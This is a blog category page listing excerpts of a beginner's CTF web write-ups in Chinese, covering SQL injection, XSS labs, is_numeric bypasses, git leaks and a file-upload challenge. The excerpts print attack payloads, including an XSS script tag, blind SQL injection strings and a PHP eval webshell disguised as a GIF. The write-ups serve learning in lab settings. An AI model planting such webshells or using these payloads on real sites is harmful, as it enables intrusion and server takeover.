![](https://img-blog.csdnimg.cn/20201014180756930.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
web
文章平均质量分 65
T0mrvvi1b3t
刚开始接触CTF的小白一枚
展开
-
pikachu中sql注入(Sql Inject)系列(未完)
pikachu中Sql Inject系列学习目标:学习内容:前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结学习目标:初步认识并学习sql注入学习内容:借助pikachu练习sql注入前言提示:这里可以添加本文要记录的大概内容:例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。提示:以下是本篇文章正文内容,下面案例可供参考一、pandas是什么?示例:pandas 是基于NumPy 的一种工具,原创 2021-04-16 00:12:30 · 208 阅读 · 0 评论 -
命令执行&代码执行漏洞学习笔记
rce原创 2021-04-16 00:10:46 · 149 阅读 · 0 评论 -
XSS-labs学习笔记
XSS-labs学习笔记什么是xssXSS分类构造xss思路靶场练习Level1:Level2:Level3:Level4:Level5:Level6:Level7:Level8:Level9:Level10:Level11:Level12:Level13:Level14:Level15:Level16:Level17:Level18:什么是xssxss(Cross Site Script),跨站脚本攻击网页内嵌入HTML,CSS,JS代码此漏洞也是网站存在相当多的漏洞,仅次于SQL注入,攻击者可原创 2021-04-13 16:29:52 · 223 阅读 · 0 评论 -
xss.haozi.me通关记录
xss-haizi-me通关记录0x000x010x020x030x040x050x060x070x080x090x0A0x0B0x0C0x0D0x0E0x0F0x100x110x12传送门0x00server code:function render (input) { return '<div>' + input + '</div>'}input code:<script>alert(1)</script>html:<div原创 2021-04-13 15:56:39 · 1172 阅读 · 1 评论 -
php中is_numeric函数的绕过
php中is_numeric函数的绕过方法一方法二方法三$j = $_POST[j];is_numeric($j)?die("<br/>not is numeric <br/>fail 10"):NULL; //数组+16进制绕过 j[]=58B、j=1315%20、j=%001315if($j > 1314){echo "<br/>pass 10";}方法一利用数组+十六进制来进行绕过j[]=58B方法二j=1315%20j=13原创 2021-04-07 19:11:20 · 5327 阅读 · 0 评论 -
虎符ctf2021 签到记录
虎符ctf2021 签到记录你会日志分析吗web-签到签到题做个记录你会日志分析吗附件是sql查询记录 ????可以发现http返回长度有399和377两种而且377占比极少,那么377对应的记录就很可能与flag有关192.168.52.156 - - [11/Mar/2021:17:49:59 +0000] "GET /index.php?id=1'%20and%20if(ord(substr((select%20schema()),0,1))=48,sleep(2),1)--+ H原创 2021-04-05 18:26:29 · 562 阅读 · 3 评论 -
vnctf2021 web复现
vnctf2021 web复现Ez_game由于本人是个大菜鸡,比赛就签了个到,尝试来复现一下,对应题目在buu上[传送门]Ez_game解法一:在控制台中输入winTimer["endTime"]=99解法二:发现game.js中有这部分可疑字符串是sojson.v4加密,在线解密传送门可以在线解密也可以直接在控制台里边跑flagflag{this_game_is_funny!}想玩出来的话,我记得flag好像是在第10关,可以直接修改cookie进入第10关,我t原创 2021-04-04 21:43:36 · 313 阅读 · 2 评论 -
从0开始学web(一) http篇
从0开始学web -- 基础 关于CRLF二级目录三级目录最近打算重新开始从头学web,简单记录一下关于CRLF二级目录三级目录原创 2021-03-27 14:15:04 · 146 阅读 · 0 评论 -
bugku web40
bugku web40 做题记录猜测git泄露解题猜测git泄露url:http://ip_address/.git发现确实存在git泄露解题在kali中递归下载 .git目录文件 ????得到一个文件夹wget -r http://ip_address/.git 在上一步得到的文件夹中执行命令????1、git reflog //查看执行的命令日志2、git reset 13ce8d0 //回退到该版本的版本库 多试几个commit id3、git sta原创 2021-03-09 09:34:17 · 1650 阅读 · 9 评论 -
[极客大挑战 2019]Upload
Buuctf [极客大挑战 2019]Upload题目信息考察点上传图片????抓包修改蚁剑链接题目信息考察点绕过后缀名检测:php,php3,php4,php5,phtml上传图片????因为<?被ban了所以采用如下方法GIF89a<script language="php"> eval($_POST["x"]);</script>将代码保存为gif文件抓包修改上传成功蚁剑链接在根目录找到flag或者直接在虚拟终端 c原创 2021-03-02 19:01:10 · 104 阅读 · 0 评论 -
攻防世界 web Training-WWW-Robots
攻防世界 web Training-WWW-Robots题目解题过程题目解题过程先baidu一下robots协议网站的根目录放一个robots.txt,会告诉搜索引擎这个网站里的那些文件可以访问,哪些不可以,所以我们先访问一下robots.txt可以看到他有一个不允许访问的文件f10g.php,但是robots.txt只是一个提示作用,并不一定代表这个php不能被访问,尝试访问一下fl0g.php...原创 2021-02-19 11:06:08 · 128 阅读 · 3 评论 -
bugku web 13 writeup
bugku web4题目信息解题思路FLAG题目信息解题思路先随便输一个貌似和web5比较像F12查看源代码其实先查看源代码最好关键代码如下:var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%.原创 2020-12-04 17:38:20 · 181 阅读 · 0 评论 -
bugku web5 writeup
bugku web5题目信息解题过程FLAG题目信息解题过程打开链接发现是一个框框随便输一个试试出现了 “在好好看看”选择去查看一下源代码发现一串东西([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(![]+[.原创 2020-12-04 17:25:15 · 160 阅读 · 0 评论 -
bugku web 头等舱 writeup
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档bugku 头等舱题目信息做法:FLAG题目信息做法:根据题目信息可以得知flag应该和“头”有关所以考虑用burp suite抓包ctrl+R 发送到Repeater这样就发现了flagFLAGflag:flag{Bugku_k8_23s_istra}...原创 2020-12-04 17:08:51 · 161 阅读 · 0 评论 -
bugku 你必须让他停下 writeup
bugku 你必须让他停下你必须让他停下手速流(233一般解法你必须让他停下打开之后是这样的界面发现网站在不断跳转 按下F12发现这个位置的内容一直在跳手速流(233接下来就是考验手速的时刻啦hahaha得到flag如图一般解法由于网站在不断地跳转所以考虑用bp抓包 下载地址最终得到flagflag{dummy_game_1s_s0_popular}web类第7篇就结束啦 想看其他的请前往目录哦...原创 2020-12-04 08:18:48 · 264 阅读 · 0 评论 -
bugku 域名解析 writeup
bugku web 域名解析前言域名解析前言web类是一题一篇的写的哦 前边的wp都在目录里(233提示:以下是本篇文章正文内容域名解析题目意思是把flag.bugku.com 解析到120.24.86.145windows下修改的文件为:c:\windows\system32\drivers\etc\hosts(如果出现没有权限的问题请参看这篇文章:Windows10没有修改hosts文件权限的解决方案(亲测有效))修改过程如上图这就OK了,访问flag.bugku.com,爆原创 2020-12-03 12:00:27 · 98 阅读 · 1 评论 -
bugku web3 writeup
bugku web3 web3web3按下F12查看源代码发现一串unicode可以自己写一个html web类第6题就到此结束啦原创 2020-12-03 11:53:20 · 152 阅读 · 0 评论 -
bugku WEB 矛盾 writeup
bugku WEB 矛盾矛盾矛盾函数is_numeric() 判断变量是否为数字如果var是数字和数字字符串返回TRUE否则返回FALSE即num既不能是数字字符,但是要等于1因此,构造payload num=1a(开头为1,字母随意) 提交上去得到flag...原创 2020-12-03 11:14:39 · 107 阅读 · 0 评论 -
bugku WEB 计算器
bugku WEB 计算器计算器计算器发现只能输入一位数字按下F12修改maxlength 为2发现可以输入两位了得到flagflag{CTF-bugku-0032}原创 2020-12-03 10:56:33 · 130 阅读 · 0 评论